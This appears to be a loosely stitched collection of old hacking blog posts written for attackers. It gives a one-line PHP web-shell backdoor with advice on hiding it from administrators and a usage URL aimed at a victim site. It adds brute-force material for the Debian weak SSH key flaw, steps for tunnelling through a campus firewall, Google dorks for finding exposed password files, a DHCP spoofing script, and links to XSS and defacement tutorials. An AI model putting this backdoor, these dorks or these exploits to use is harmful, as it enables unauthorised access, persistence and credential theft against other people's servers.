this is very simple backdoor script that i always used.just put at the htdocs or where ever the default root path set by the admin. and dont forget to give a hidden name. started by dot ( . ) like .help.php or somthing else that not look suspicious. or you can make a hidden directory also started by dot ( . ) like .ssh or else, and make sure that you give a different permission from the owner of root path of the default path. usually it will be owned by www-data just set your backdoor script owned by different user like mysql or else. coz somethimes the administrator for the web file do not a super user priveledge so it can keep your backdoor script safe.

here is the script, i put as .ssh.php

<? system ($_GET[’cmd’]) ?>

and how to use this one?

http://victim.com/.ssh.php?cmd=[Command here]

you put do any command there. that all. enjoy!

so why i got different result on a two vulnerable box. here what i got, it’s okay that this is not truly hole that we can hack and get own our target , it like the other bruteforce hacking technique, just matching to their database that has a approximation to the matching key. and for not the vulnerable is the rsa key , when you make a authorized_keys to your box, that the hole!! if there is not authorized_keys that you set on your box i bet it can’t be hack using only the technique i post before.

so how to againts this vulnerability? it’s pretty simple,just remove an authorized_keys setting on you box, and install a preventing package, a forget the package name it like black-list , to make your box key harder to predict. that’s all, enjoy !

so what is it? if you have read my articles about how to using pairkey as a backdoor or rookit. this vulnerable is also playing using SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc). Luciano bello found that he said between September 2006 and May 13th, 2008 in case of SSL keys, Any Certificate Authority keys generated on a Debian-based system is vulnerable!! . All system administrators that allow users to access their servers with SSH and public key authentication need to audit those keys to see if any of them were created on a vulnerabile system. Any tools that relied on OpenSSL’s PRNG to secure the data they transferred may be vulnerable to an offline attack.

the simple explanation will be like this when creating a new OpenSSH key, or when you type “ssh-keygen” there are only 32,767 possible outcomes for a given architecture, key size, and key type. The reason is that the only “random” data being used by the PRNG is the ID of the process.and what if we have all list of possibility outcomes? here we go.. this man have all of it , and of course the script for bruteforcing it too. and in addition the script to do the remote scan

all you can download here :

http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2

http://demo21.ovh.com/82a960d7199ea9391c73c2034b6b34dfP/debian_ssh_scan_v4.tar.bz2

http://milw0rm.com/exploits/5632

ps :

i’ve try this exploits, i don’t get it all coz i just tried it last night, not all that VULNERABLE server you scanned can you brute for, even if the scanner said it VULNERABLE. this is what i don’t get it. but i got one vulnerable :P, maybe i’ll post the step by step how to using this script , maybe next post , that all. thanks

for windows :

• open your putty(get the latest version)
• set on SSH section on Tunnel tab, add a port that will use you use on you computer. and set it as a dynamic one.
• at the main SSH section set the putty to Don’t start a shell command at all
• set at the Proxy section. chose the http one, and put you campus or office proxy server there, if it need a authentication put below it.
• and the last is go to the Session section, set it to your Socks server and put the port.
• you done,you have a new socks server new!

for linux here some ssh command that you need

• ssh [user@socksserver] -p [ServerPort] -fND OurPort -o “ProxyCommand connect-proxy -H CampusProxyServer:CampusProxyPort %h %p”

just in case that you need a authentication , you can use this command first :

• export HTTP_PROXY_USER=user@server
• export HTTP_PROXY_PASSWORD=passowrd
• and done

enjoy!

. It’s also worth nothing directories whose names containthe words admin,backup and so forth – a query like inurl:admin  intitle:index.of will do the trick.here are some Google queries for locating passwords :

“http://*:*@www” site : passwords for site, stored as the string “http://username:password@www…”
filetype:bak inurl:”htaccess|passwd|shadow|ht users” :file backups, potentially containing user names and passwords
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” : mdb files, potentially containing password information
intitle:”Index of” pwd.db  : pwd.db :files, potentially containing user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of : directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD : WS_FTP configuration files, potentially containing FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-” : files containing Microsoft FrontPage passwords
filetype:sql (”passwd values ****” |  “password values ****” | “pass values ****” ) : files containing SQL code and passwords inserted into a database

intitle:index.of trillian.ini :           configuration files for the Trillian IM
eggdrop filetype:user user :                configuration files for the Eggdrop ircbot
filetype:conf slapd.conf :              configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password” :    configuration files for WV Dial
ext:ini eudora.ini :          configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb   : Microsoft Access files, potentially containing user account information
intext:”powered by Web Wiz Journal” :  websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http://<host>/journal/journal.mdb instead of the default http://<host>/  journal/

“Powered by DUclassified” -site:duware.com :  websites using the DUclassified, DUcalendar, DUdirectory, DU-
“Powered by DUcalendar” -site:duware.com :   classmate, DUdownload, DUpaypal, DUforum or DUpics applica-
“Powered by DUdirectory” -site:duware.com :   tions, which by default make it possible to obtain the passwords
“Powered by DUclassmate” -site:duware.com :    file – for DUclassified, just enter http://<host>/duClassified/ _
“Powered by DUdownload” -site:duware.com :   private/duclassified.mdb instead of http://<host>/duClassified/
“Powered by DUpaypal” -site:duware.com :
“Powered by DUforum” -site:duware.com :
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com :

intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board” : websites using the Bitboard2 bulletin board application, which on default settings allows the passwords file to be obtained – enter http://<host>/forum/admin/data _ passwd.dat instead of the default http://<host>/forum/forum.php

this first post is the preparing and finding the server first.to make it simple here is the step :

• find a server, outside your campus of course. there will be some thing complicated here. you must find a server that allow a same port that allowed on you campus firewall setting. some times it allowed and some not. ok. it is complicated i thing, this is some example :
  • i have a server A outside my campus, that open a ssh service on port 666. so i have to connect to to this server via my campus connection , and we’ll use a socks technique to make server A become our new socks server
• you can try a shared socks server or http one, you can search at google it pretty much there. now we’ll try to make a connection to our server. there are two ways to test this step first using telnet and the last using connect-proxy method.
  • connect proxy is a binary that we must install first. we will need this when we make the connection to our server.
  • connect-proxy will be like this : export your http_proxy,http_password and try to connect to server

export HTTP_PROXY_USER=me@server
export HTTP_PROXY_PASSWORD=password
connect-proxy -H campus-proxy-server:port SERVER-A portA

what happen here is we try to connect to server-A:portA using our campus-proxy-server:port , campus-proxy is our campus proxy server.you’ll notice whne you allowed to connect. if it not i thing it give you 304 access denied

i want to give another step using telnet but i dont now how to give a username and password authentication using telnet so i thing you can try the first step one.

i thing this is enough for the opening, try to find a server first because without it it will be useless of course.

#!/usr/bin/env python

from scapy import *
def usage():
print “Usage: DHCPspoof <ip> <name>“
sys.exit(1)
if len(sys.argv) != 3:
usage()
requested_ip = sys.argv[1]
requested_name = sys.argv[2]
interface = conf.route.route(requested_ip)[0]
localmac = get_if_hwaddr(interface)
localip = get_if_addr(interface)
print(”Sending DHCPREQUEST”)
ether = Ether(src=”00:00:00:00:00:00″, dst=”ff:ff:ff:ff:ff:ff”)
ip = IP(src=”0.0.0.0″, dst=”255.255.255.255″)
udp = UDP(sport=68, dport=67)
bootp = BOOTP(chaddr=localmac, xid=0×11033000)
dhcpOptions = DHCP(options=[(’message-type’, ‘request’), (’hostname’, requested_name),
(’requested_addr’, requested_ip), (’end’)])
packet = ether/ip/udp/bootp/dhcpOptions
sendp(packet)

this coded using python by Jason Macpherson. enjoy !

and this little list from the latest web vulnerability

The Attack of the TINY URLs
CSS History Stealing Acts As Cookie
Backdooring MP3 Files
Detecting FireFox Extensions
Backdooring QuickTime Movies
Stealing User Information Via Automatic Form Filling
CSS history hacking with evil marketing
Circumventing DNS Pinning for XSS
I know where you’ve been
Netflix.com XSRF vuln
Stealing Search Engine Queries with JavaScript
Browser Port Scanning without JavaScript
Hacking RSS Feeds
Widespread XSS for Google Search Appliance
MX Injection : Capturing and Exploiting Hidden Mail Servers Bypassing Filters With Encoding
Blind web server fingerprinting
Variable Width Encoding
JavaScript Port Scanning
Network Scanning with HTTP without JavaScript
CSRF with MS Word
AT&T Hack Highlights Web Site Vulnerabilities
Backdooring PDF Files
How to get linked from Slashdot
Exponential XSS Attacks
F5 and Acunetix XSS disclosure
Malformed URL in Image Tag Fingerprints Internet Explorer
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
JavaScript Portscanning and bypassing HTTP Auth
Google plugs phishing hole
Bruteforcing HTTP Auth in Firefox with JavaScript

and here is the full list latest website vulnerability

“Generated by phpSystem” :  operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points
“This summary was generated by wwwstat” :     web server statistics, system file structure
“These statistics were produced by getstats” :        web server statistics, system file structure
“This report was generated by WebLog” :       web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis” :  system performance statistics as MRTG charts, network       configuration

intitle:”Apache::Status” (inurl:server-status | inurl: status.html | inurl:apache.html) : server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” “ASP Stats  Generator” “2003-2004 weppos” :    web server activity, lots of visitor information

intitle:”Multimon UPS status page” :              UPS device performance statistics
intitle:”statistics of” “advanced web statistics” :  web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center” :  system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer” : web server statistics, visitor information, system file   structure
intitle:”Web Server Statistics for ****” :      web server statistics, visitor information
inurl:”/axs/ax-admin.pl” -script :             web server statistics, visitor information
inurl:”/cricket/grapher.cgi” :                MRTG charts of network interface performance
inurl:server-info “Apache Server Information” :        web server version and configuration, operating system
type, system file structure
“Output produced by SysWatch *” : operating system type and version, logged users, free                       memory and disk space, mount points, running processes, system logs

it little messed up, but i think you can read it,, enjoy!

http://milw0rm.com/papers/173

wrote by t0pP8uZz a complete walkthrough about xss, telling about the very basic about xss , deface method , cookie stealing, filteration bypassingm, advance xss and of course how to securing xss.

http://xssed.com/articleslist

complete literatur for xss technique you can find here, all you need provide here, from articles and xssed site, they updated the xssed database every day, maybe this is the largest directory that talking about xss.

the articles link is here

http://xssed.com/articleslist

and the last is video tutorial how to deface a website, here is the link, get it from sla.ckers.org , taken an example defaceing Horde Webmail. enjoy!

http://rapidshare.com/files/22726382/Horde_xss_defacement.avi.html